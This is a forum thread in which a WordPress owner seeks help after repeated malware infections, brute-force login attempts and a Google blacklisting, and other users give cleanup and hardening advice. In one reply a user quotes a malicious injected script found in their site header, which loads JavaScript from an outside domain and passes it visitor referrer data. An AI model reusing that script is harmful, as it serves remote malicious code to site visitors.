1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Someone Messing With My Wordpress Site

Discussion in 'Blogging' started by Donbuffy, Nov 12, 2016.

  1. Donbuffy

    Donbuffy Jr. VIP Jr. VIP

    Joined:
    Jul 23, 2012
    Messages:
    385
    Likes Received:
    68
    Gender:
    Male
    Occupation:
    Self Employed
    Been having series of attacks on my website which is designed using wordpress, first i got malware injections on my DB and i almost lost everything on the site, then now i get brute forcing attempts on my admin login page (saw the notifications from my Wordfence plugin) now someone claimed ownership of the domain through google webmaster using the html file verification, couple of minutes ago i got a message from google that my website has been blacklisted due to hacked content detected. i used the "site:yourdomain.com" method of tracing the pages and i get many spam pages created on the search results but can't find it on my file manager or wordpress page column, contacted my host a couple of time to scan and quarantine malware on the domain and this is the third time in a week it was scanned and malware found where quarantined and replace with the default wordpress core files... any one have ideas to make this stop totally.
     
  2. CyberHour

    CyberHour Jr. VIP Jr. VIP

    Joined:
    Apr 3, 2016
    Messages:
    754
    Likes Received:
    192
    Location:
    localhost
    Home Page:
    Hello Donbuffy,
    Most likely someone from your competitors love you , or you are using nulled themes/plugins (this regarding the infection).

    Fresh WP installation installing premium (not nulled theme) adding BrutalForce blocker and SSL is your first steps.

    Scan your files and especialy /wp-content/upload which should have only images .

    Best Regards,
    Alex-CyberHour
     
  3. JJJackson

    JJJackson Jr. VIP Jr. VIP

    Joined:
    May 21, 2016
    Messages:
    465
    Likes Received:
    291
    Occupation:
    Gatekeeper
    Home Page:
    Sanitize your Sql queries (prepare, execute) also you can whitelist ip's to prevent bruteforce attacks. You could also use private/public keys or implement a system like fail2ban to ban ip's on failed login attempts.
     
  4. Juneja

    Juneja Elite Member

    Joined:
    Jun 12, 2016
    Messages:
    1,640
    Likes Received:
    245
    Location:
    Internet
    Are you using nulled theme or plugin?
     
  5. Donbuffy

    Donbuffy Jr. VIP Jr. VIP

    Joined:
    Jul 23, 2012
    Messages:
    385
    Likes Received:
    68
    Gender:
    Male
    Occupation:
    Self Employed
    Sometime ago i used a few nulled plugin, deactivated them already.
     
  6. gabryel1990

    gabryel1990 Registered Member

    Joined:
    Oct 28, 2013
    Messages:
    78
    Likes Received:
    17
    Location:
    romania
    Home Page:
    I recently deleted 2 big websites due to malware.Here are my conclusions:

    - once it got infected, start from scratch, delete everything you had before
    - all the websites (wp) from the same public_html folder will be infected,delete them all
    - never accept themes or plugins from someone else - they can be nulled - infected
    - keep all your websites up to date - wp version,themes and plugins - I guess this was my vulnerability, one old website with a few articles was getting visits daily, I don't know from where but someone prepared this for a long time.
    - on all the infested websites I found the same .zip file . This archive should not be there so that's how the virus was uploaded.
    - finally, I lost a lot of money. The virus was redirecting all my mobile users to their ads :)

    Good luck!
     
  7. Donbuffy

    Donbuffy Jr. VIP Jr. VIP

    Joined:
    Jul 23, 2012
    Messages:
    385
    Likes Received:
    68
    Gender:
    Male
    Occupation:
    Self Employed
    Thanks for this CYBER Hour, can you recommend a plugin i can use to scan my /wp-content/upload, or should i talk to my host about it?
    Currently using wordfence and its scan takes days to work well....

    Well already deactivated and deleted the nulled plugin on the site, yet still get attacks... how do i clean up the site?

    Been recommended sulcuri site scan for malware removal for $16 a month.

    do you think getting a SSL certificate would stop/minimize the attacks? hardly see blogs with a https:// ?
     
  8. CyberHour

    CyberHour Jr. VIP Jr. VIP

    Joined:
    Apr 3, 2016
    Messages:
    754
    Likes Received:
    192
    Location:
    localhost
    Home Page:
    Donbuffy your host should be able to remove any non jpeg/jpg/png/gif format file in there. Also with .htaccess in /upload you can disable any other formats.

    We suggest using Anti-Malware Security and Brute-Force Firewall its free and work perfect.

    Removing/Deactivating is not changing anything on already infected website. You will have to make fresh installation and then replace wp_posts sql with your old one so you transfer your posts and only.

    You will hardly see blogs WITHOUT ssl prety soon :) If you are on shared hosting ask your host to activate Let's Encrypt which is free or if you are on VPS install Let's encrypt your self.

    Best Regards,
    Alex-CyberHour
     
  9. BulletServers

    BulletServers Junior Member

    Joined:
    Aug 28, 2015
    Messages:
    104
    Likes Received:
    13
    donot waste your time on fixing it.

    remove everything and start from scratch. change email, hosting providers and start

    it will be up and working in few days and never use nulled plugins and stuff again.
     
  10. fadale07

    fadale07 Newbie

    Joined:
    Sep 18, 2014
    Messages:
    37
    Likes Received:
    1
    let say we start the website again from scratch, we use the same domain and content, will it affecting our ranking in google?

    im facing the same issue, malware keep coming into my website. after i deleted the malware in the header section, a few hours later the malware come back.

    does anyone facing this kind of script that keep injecting in the header?

    <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://goroomie.com/js/jquery.min.php”; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>
     
  11. Donbuffy

    Donbuffy Jr. VIP Jr. VIP

    Joined:
    Jul 23, 2012
    Messages:
    385
    Likes Received:
    68
    Gender:
    Male
    Occupation:
    Self Employed
    You make it sound so easy, removing everything would cost me all my posts and redesign, changing email, hosting providers won't stop the attack from coming in...

    But you have a point.
     
  12. MikeyMikey13

    MikeyMikey13 Supreme Member

    Joined:
    May 25, 2014
    Messages:
    1,418
    Likes Received:
    393
    Well take this as a lesson not to use Nulled themes. Thought you was saving some $$ but it came back to bite you
     
  13. We Bring Rank

    We Bring Rank Jr. VIP Jr. VIP

    Joined:
    Aug 21, 2016
    Messages:
    638
    Likes Received:
    69
    Gender:
    Male
    Occupation:
    Digital Marketing Analyst
    Home Page:
    Try to avoid free nulled themes and plugins..and add SSL to your site and also anti malware to your site..For these, you need to spend more
     
    Last edited: Nov 12, 2016
  14. CyberHour

    CyberHour Jr. VIP Jr. VIP

    Joined:
    Apr 3, 2016
    Messages:
    754
    Likes Received:
    192
    Location:
    localhost
    Home Page:
    And can you explain to others HOW hosting provider is related to such issue? :)
     
  15. aa33030

    aa33030 Regular Member

    Joined:
    Mar 11, 2011
    Messages:
    294
    Likes Received:
    34
    Location:
    United States
    Home Page:
    It's a "bulletservers" promotional posto_O
     
  16. CyberHour

    CyberHour Jr. VIP Jr. VIP

    Joined:
    Apr 3, 2016
    Messages:
    754
    Likes Received:
    192
    Location:
    localhost
    Home Page:
    :)
     
  17. Donbuffy

    Donbuffy Jr. VIP Jr. VIP

    Joined:
    Jul 23, 2012
    Messages:
    385
    Likes Received:
    68
    Gender:
    Male
    Occupation:
    Self Employed
    Can you recommend any anti malware plugin, so far Wordfence & WP Security is what i have tried out.
     
  18. Donbuffy

    Donbuffy Jr. VIP Jr. VIP

    Joined:
    Jul 23, 2012
    Messages:
    385
    Likes Received:
    68
    Gender:
    Male
    Occupation:
    Self Employed
    Trying to export my posts and pages in a .xml file using wordpress export tool, wipe the whole site out... install a new wordpress and redesign.
    Hope that works out well!

    Still don't know how SSL is going to protect my blog from future attacks (doing some research tho), might just go for it....

    it seems the malware is also affecting a few domain on my shared server, maybe i could just move this one to a new seperate server.
     
  19. jamil

    jamil Newbie

    Joined:
    Jul 29, 2008
    Messages:
    41
    Likes Received:
    23

    Possible that the server is infected, especially if the host has scanned it and problem is still there, getting your sites off that server would be a good move.
     
  20. CyberHour

    CyberHour Jr. VIP Jr. VIP

    Joined:
    Apr 3, 2016
    Messages:
    754
    Likes Received:
    192
    Location:
    localhost
    Home Page:
    Short answer : nop
    Long answer: Unless you are on hosting provided by amateurs .
     
    • Thanks Thanks x 1